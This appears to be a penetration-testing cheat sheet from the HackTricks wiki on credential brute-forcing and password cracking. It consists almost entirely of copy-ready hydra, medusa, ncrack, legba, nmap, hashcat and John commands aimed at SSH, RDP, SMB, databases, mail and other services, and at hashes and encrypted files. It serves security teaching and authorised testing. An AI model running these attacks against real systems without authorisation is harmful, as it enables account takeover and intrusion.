Documentation Index Fetch the complete documentation index at: https://mintlify.com/HackTricks-wiki/hacktricks/llms.txt
Use this file to discover all available pages before exploring further.
Default Credentials Always start by trying default credentials before launching a full brute-force attack:
Creating Custom Dictionaries Crunch crunch 4 6 0123456789ABCDEF -o crunch1.txt # Length 4-6, hex chars crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Exactly length 4 crunch 6 8 -t ,@@^^%% # Pattern: uppercase, lower, lower, special, special, digit, digit
CeWL — Website Wordlist Generator cewl example.com -m 5 -w words.txt # Min length 5, from target site
CUPP — Profile-Based Passwords python3 cupp.py -h # Interactive mode based on target's personal info
Wister python3 wister.py -w jane doe 2022 summer madrid 1998 -c 1 2 3 4 5 -o wordlist.lst
Recommended Wordlists Services — Brute Force Commands
hydra -l root -P passwords.txt [-t 32] < I P > ssh ncrack -p 22 --user root -P passwords.txt < I P > [-T 5] medusa -u root -P 500-worst-passwords.txt -h < I P > -M ssh legba ssh --username admin --password wordlists/passwords.txt --target localhost:22 # Key-based brute force legba ssh --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22
hydra -l root -P passwords.txt [-t 32] < I P > ftp ncrack -p 21 --user root -P passwords.txt < I P > [-T 5] medusa -u root -P 500-worst-passwords.txt -h < I P > -M ftp legba ftp --username admin --password wordlists/passwords.txt --target localhost:21
hydra -L users.txt -P passwords.txt sizzle.htb.local http-get /certsrv/ medusa -h < I P > -u < usernam e > -P passwords.txt -M http -m DIR:/path/to/auth -T 10 legba http.basic --username admin --password wordlists/passwords.txt --target http://localhost:8888/
hydra -L users.txt -P passwords.txt domain.htb http-post-form \ "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" # For HTTPS use https-post-form
ncrack -vv --user < Use r > -P pwds.txt rdp:// < I P > hydra -V -f -L userlist -P passlist rdp:// < I P > legba rdp --target localhost:3389 --username admin --password data/passwords.txt
nmap --script smb-brute -p 445 < I P > hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1 legba smb --target share.company.com --username admin --password data/passwords.txt
hydra -L usernames.txt -P pass.txt < I P > mysql medusa -h < I P > -u < usernam e > -P password_list -M mysql legba mysql --username root --password wordlists/passwords.txt --target localhost:3306
# MSSQLPwner mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt legba mssql --username SA --password wordlists/passwords.txt --target localhost:1433
hydra -L user.txt -P pass.txt < I P > postgres ncrack -U user.txt -P pass.txt < I P > :5432 legba pgsql --username admin --password wordlists/passwords.txt --target localhost:5432
hydra -l < usernam e > -P /path/to/passwords.txt < I P > smtp -V hydra -l < usernam e > -P /path/to/passwords.txt -s 587 < I P > -S -v -V legba smtp --username admin@example.com --password wordlists/passwords.txt --target localhost:25
hydra -L user.txt -P pass.txt -s < POR T > < I P > vnc medusa -h < I P > -u root -P pass.txt -M vnc nmap -p 5900,5901 --script vnc-brute --script-args brute.credfile=wordlist.txt < I P > legba vnc --target localhost:5901 --password data/passwords.txt
nmap --script ldap-brute -p 389 < I P > legba ldap --target 127.0.0.1:389 --username admin --password @wordlists/passwords.txt --ldap-domain example.org
hydra -l root -P passwords.txt [-t 32] < I P > telnet legba telnet --username admin --password wordlists/passwords.txt --target localhost:23 \ --telnet-user-prompt "login: " --telnet-pass-prompt "Password: "
nmap -sU --script snmp-brute < targe t > onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt < I P > hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp
hashcat -m 16500 -a 0 jwt.txt rockyou.txt john jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256 python3 jwt_tool.py -d wordlists.txt < JWT_toke n >
Hash Cracking — Local Online Cracking Databases Hashcat # Wordlist attack with rules hashcat -a 0 -m 1000 ntlm.txt rockyou.txt -r rules/best64.rule # Mask attack (uppercase + 6 lowercase + digit) hashcat -a 3 -m 1000 ntlm.txt ?u?l?l?l?l?l?l?d # Combinator attack (combine two wordlists) hashcat -a 1 -m 1000 ntlm.txt wordlist1.txt wordlist2.txt # Common hash modes # 1000 = NTLM # 1800 = sha512crypt (Linux $6$) # 3200 = bcrypt # 13100 = Kerberoast (TGS-REP) # 16800 = WPA-PMKID-PBKDF2 # 22000 = WPA-PBKDF2-PMKID+EAPOL
John the Ripper john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt john --wordlist=words.txt --rules --stdout > w_mutated.txt john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
Archive and File Cracking # ZIP fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip zip2john file.zip > zip.john && john zip.john # PDF pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt # KeePass keepass2john file.kdbx > hash john --wordlist=/usr/share/wordlists/rockyou.txt hash # LUKS disk encryption bruteforce-luks -f ./list.txt ./backup.img hashcat -m 14600 -a 0 luckshash wordlists/rockyou.txt
References 
